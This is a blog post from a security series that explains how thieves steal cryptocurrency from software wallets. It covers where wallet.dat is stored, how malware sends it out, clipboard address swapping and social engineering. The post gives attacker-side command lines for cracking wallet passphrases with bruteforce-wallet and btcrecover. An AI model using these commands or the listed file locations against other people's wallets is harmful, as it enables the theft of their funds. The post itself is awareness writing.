Life Explorers - Security - Cryptocoin wallets Part 2: Risk of the software wallet.

in security •  8 years ago  (edited)

In the first part I wrote a general overview about cryptocoin wallets. We will have a closer look at the software wallet this time.

Software wallet
A cryptocoin wallet is different then a normal wallet. Because it does not really coin your coins. The coins exist in the blockchain. What the wallet does contain are the secure digital keys used to access your public cryptocoin addresses and to sign transactions. The private keys are what you need to your address and spend your funds.

The software wallet has different components. There are some differences from coin to coin, but when you install a software wallet you will find the following files in a directory with the coin name.

C:\Documents and Settings\YourUserName\Application data\Bitcoin (XP)
C:\Users\YourUserName\Appdata\Roaming\Bitcoin (Vista and later)
~/.bitcoin/ (linux)
~/Library/Application Support/Bitcoin/ (Mac)

Files like: bitcoin.conf (configuration), peers.dat (connection info), debug.log and ofcourse the wallet.dat. You will also find directories with files as blk*.dat (blockchain data). But a hacker will be interested in the wallet.dat because of the keys that are stored there.

Malware
One of the easiest ways to get bitcoins is to create malware. It would not be wise to advertise how to do it. But you can imagen creating a file with evil code will do the trick.

First the malware will execute a search for the wallet.dat to make it efficient is will target the known directories I showed you earlier. When the file is located we can create a covert channel. That means using existing information channels. It is not difficult to hide traffic in normal traffic like http, https but also dns.

So now your wallet.dat is uploaded to a server and in the hands of the bad guys. If you did not encrypt your wallet with a passphrase you will be a very easy target.

If you did use a passphrase the attackers needs time to brute force your password. There are tools who can do that for him.

Getting the password
There is a script named bruteforce-wallet. It can be used in 2 ways. Try all the possible passwords given a charset or try all the passwords in a file. And there are very nice files with the most common used passwords. This can speed up the hacking process for sure. So words like P@SSw0rd2016 or something is easy. The command you would use for that is :
bruteforce-wallet -t 6 -f dictionary.txt wallet.dat

But if the attacker have some knowledge over you it could also use a tool like btcrecover. You can use words or number you think the victim uses.

The attacker will put the words in tokens. Btcrecover will try all possible combinations using one or more of these three tokens, It can also play around with how you spelled or capitalized one of those words.
C:\python27\python btcrecover.py --wallet wallet.dat --tokenlist tokens.txt

But when you already created your malware why not add a key logger with it. So you don't have to crack it at all.

Tricking you
But there are also other ways to steal your coins from your pc. Why would you as an attacker take the risk of running a server for storing the wallet.dat and/or the key logs? It can be traced back to you if your not careful. So creating malware that detects it when you copy/paste a bitcoin (or other coin) address and then simply replaces the address for the attackers address. You will probably not notice it and then your coins are making their way to the thief.

Social engineering
Like most of the hacks the technical site is not the primary problem. It is the user. Why finding a hole when you can mislead the user to install malware.

One of the big hacks on a exchange was possible to target key employees with social engineering attacks. To be exact personal information was used to trick them. They used Skype and email to communicate with employees and distributed files containing malware by appealing to their personal interests.

Cryptocoins are beautiful but not without risk.

Author's Note: The Life Explorer Series is a community magazine that brings together writers to post about a variety of topics. All topics and authors using the #lifeexplorer tag or title are part of this group and have permission to post under the heading Life Explorer. If you would like to write with the Life Explorer series about a topic, reach out and get in chat contact with @timsaid to learn more.

Make sure to catch all these Life Explorer authors:
@prufarchy
@yogi.artist
@timsaid

And if you've missed the previous edition, check out the first Life Explorer post: https://steemit.com/security/@disofdis/life-explorers-security-cryptocoin-wallets-part-1-introduction-to-cryptocoins-wallets

security lifeexplorers cryptocoins lifeexplorer
8 years ago by

Downvoting a post can decrease pending rewards and make it less visible. Common reasons:

  • Disagreement on rewards
  • Fraud or plagiarism
  • Hate speech or trolling
  • Miscategorized content or spam

Submit
$0.04
  • Past Payouts $0.04
  • - Author $0.04
  • - Curators $0.00
7 votes
0
Authors get paid when people like you upvote their post.
If you enjoyed what you read here, create your account today and start earning FREE STEEM!